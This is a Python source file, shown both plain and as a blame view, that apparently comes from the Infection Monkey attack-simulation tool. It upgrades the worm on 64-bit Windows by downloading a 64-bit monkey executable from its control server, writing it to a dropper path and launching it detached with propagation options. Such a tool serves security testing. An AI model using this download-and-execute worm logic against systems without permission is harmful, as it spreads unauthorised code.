monkey/infection_monkey/windows_upgrader.py

import logging
import subprocess
import sys
import shutil

import time

import monkeyfs
from config import WormConfiguration
from control import ControlClient
from exploit.tools import build_monkey_commandline_explicitly
from model import MONKEY_CMDLINE_WINDOWS
from utils import is_windows_os, is_64bit_os, is_64bit_python

__author__ = 'itay.mizeretz'

LOG = logging.getLogger(__name__)

if "win32" == sys.platform:
    from win32process import DETACHED_PROCESS
else:
    DETACHED_PROCESS = 0


class WindowsUpgrader(object):
    __UPGRADE_WAIT_TIME__ = 3

    @staticmethod
    def should_upgrade():
        return is_windows_os() and is_64bit_os() \
               and not is_64bit_python()

    @staticmethod
    def upgrade(opts):
        monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
        with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
            with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:
                shutil.copyfileobj(downloaded_monkey_file, written_monkey_file)

        monkey_options = build_monkey_commandline_explicitly(opts.parent, opts.tunnel, opts.server, opts.depth)

        monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {
            'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options

        monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
                                          stdin=None, stdout=None, stderr=None,
                                          close_fds=True, creationflags=DETACHED_PROCESS)

        LOG.info("Executed 64bit monkey process (PID=%d) with command line: %s",
                 monkey_process.pid, monkey_cmdline)

        time.sleep(WindowsUpgrader.__UPGRADE_WAIT_TIME__)
        if monkey_process.poll() is not None:
            LOG.error("Seems like monkey died too soon")
Change config value name Add logs 2018-03-01 01:01:42 +08:00			`import logging`
Fix various bugs 2018-02-28 22:24:40 +08:00			`import subprocess`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00			`import sys`
Fixed most CR 2018-04-12 00:07:03 +08:00			`import shutil`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
Change config value name Add logs 2018-03-01 01:01:42 +08:00			`import time`

Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00			`import monkeyfs`
			`from config import WormConfiguration`
			`from control import ControlClient`
			`from exploit.tools import build_monkey_commandline_explicitly`
Monkey now uses different names for 32,64bit on windows. No need to use dropper or rename moneky 2018-03-04 23:05:43 +08:00			`from model import MONKEY_CMDLINE_WINDOWS`
Fix last CR comments 2018-04-12 02:09:06 +08:00			`from utils import is_windows_os, is_64bit_os, is_64bit_python`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
			`__author__ = 'itay.mizeretz'`

Change config value name Add logs 2018-03-01 01:01:42 +08:00			`LOG = logging.getLogger(__name__)`

Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00			`if "win32" == sys.platform:`
			`from win32process import DETACHED_PROCESS`
			`else:`
			`DETACHED_PROCESS = 0`


			`class WindowsUpgrader(object):`
Fixed most CR 2018-04-12 00:07:03 +08:00			`__UPGRADE_WAIT_TIME__ = 3`

Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00			`@staticmethod`
			`def should_upgrade():`
Fix last CR comments 2018-04-12 02:09:06 +08:00			`return is_windows_os() and is_64bit_os() \`
			`and not is_64bit_python()`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
			`@staticmethod`
			`def upgrade(opts):`
			`monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)`
			`with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:`
Fixed most CR 2018-04-12 00:07:03 +08:00			`with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:`
			`shutil.copyfileobj(downloaded_monkey_file, written_monkey_file)`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
Fixed most CR 2018-04-12 00:07:03 +08:00			`monkey_options = build_monkey_commandline_explicitly(opts.parent, opts.tunnel, opts.server, opts.depth)`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
Monkey now uses different names for 32,64bit on windows. No need to use dropper or rename moneky 2018-03-04 23:05:43 +08:00			`monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {`
			`'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options`
Add basic logic to windows upgrade 2018-02-28 20:10:01 +08:00
Fix various bugs 2018-02-28 22:24:40 +08:00			`monkey_process = subprocess.Popen(monkey_cmdline, shell=True,`
			`stdin=None, stdout=None, stderr=None,`
			`close_fds=True, creationflags=DETACHED_PROCESS)`
Change config value name Add logs 2018-03-01 01:01:42 +08:00
			`LOG.info("Executed 64bit monkey process (PID=%d) with command line: %s",`
			`monkey_process.pid, monkey_cmdline)`

Fixed most CR 2018-04-12 00:07:03 +08:00			`time.sleep(WindowsUpgrader.__UPGRADE_WAIT_TIME__)`
Change config value name Add logs 2018-03-01 01:01:42 +08:00			`if monkey_process.poll() is not None:`
Fixed most CR 2018-04-12 00:07:03 +08:00			`LOG.error("Seems like monkey died too soon")`